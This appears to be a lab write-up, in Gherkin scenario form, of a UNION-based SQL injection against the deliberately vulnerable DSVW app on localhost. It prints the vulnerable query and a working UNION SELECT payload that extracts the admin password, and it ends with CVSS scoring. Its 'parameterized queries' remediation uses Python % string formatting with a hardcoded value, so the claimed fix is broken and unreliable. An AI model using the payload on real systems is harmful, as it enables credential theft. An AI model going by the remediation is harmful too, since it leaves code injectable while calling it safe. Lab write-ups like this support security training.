## Version 1.4.1
## language: en

Feature:
  TOE:
    dsvw
  Category:
    UNION SQL Injection
  Location:
    http://127.0.0.1:65412/?id
  CWE:
    CWE-89: https://cwe.mitre.org/data/definitions/89.html
    CWE-564: https://cwe.mitre.org/data/definitions/564.html
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Verify if the site is vulnerable to SQL Injection UNION Based
  Recommendation:
    Use parameterized queries
  Background:
    Hacker's software:
    | <Software name>                  | <Version>     |
    | Windows 10                       | 1809          |
    | Google Chrome                    | 75.0.3770.100 |
    | Windows Subsystem for Linux      | 1             |
    | Sqlmap                           | 1.3.4         |
    | Burp                             | 2.1           |
  TOE information:
    Given I am accessing the site http://127.0.0.1:65412/
    And the server is running BaseHTTP version 0.3
    And Python version 2.7.16
    And SQLite version 3

  Scenario: Normal use case
    When I make the next request:
    """
    GET http://127.0.0.1:65412/?id=2 HTTP/1.1
    """
    Then the site return the the site return information of user with id 2
    """
    id username name     surname
    2  amason   anthony  mason
    """

  Scenario: Static detection
    When I look at the code of file DSVW\dsvw.py
    """
    30 cursor.execute("SELECT id, username, name, surname
     FROM users WHERE id=" + params["id"])
    """
    Then I concluded that insecure queries are made

  Scenario: Dynamic detection
    When I see how the requests are made:
    """
    GET http://127.0.0.1:65412/?id=2 HTTP/1.1
    """
    Then the id parameter is passed through the url
    When I see how the requests are made:
    """
    GET http://127.0.0.1:65412/?id=2; or 1='1' HTTP/1.1
    """
    Then the site return:
    """
    Traceback (most recent call last):
      File "dsvw.py", line 30, in do_GET
        cursor.execute("SELECT id, username, name, surname FROM
         users WHERE id=" + params["id"])
    Warning: You can only execute one statement at a time.
    """
    Then I can conclude that id parameter is a possible attack vector

  Scenario: Exploitation
    When I make the next request:
    """
    GET http://127.0.0.1:65412/?id=2 UNION ALL SELECT NULL, NULL, NULL,
     (SELECT id||','||username||','||password FROM users WHERE
    username='admin') HTTP/1.1
    """
    Then I get all data of admin user:
    """
    id username name surname
    2  dricci   dian  ricci
                  - - - 1,admin,7en8aiDoh!
    """
    Then I can conclude that the vulnerability has been exploited

  Scenario: Remediation
    When making queries, use parameterized queries
    """
    30 sql = "SELECT id, username, name, surname FROM users WHERE id= %s"
    31 cursor.execute(sql % ("2",))
    """
    Then I make the next request:
    """
    GET http://127.0.0.1:65412/?id=2 UNION ALL SELECT NULL, NULL, NULL,
     (SELECT id||','||username||','||password FROM users WHERE
    username='admin') HTTP/1.1
    """
    And the the site returns:
    """
    id username  name  surname
    2  amason anthony  mason
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.3/10 (Medium) - E:H/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    5.6/10 (Medium) - CR:L/IR:L/AR:L/MAV:X/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-07-19

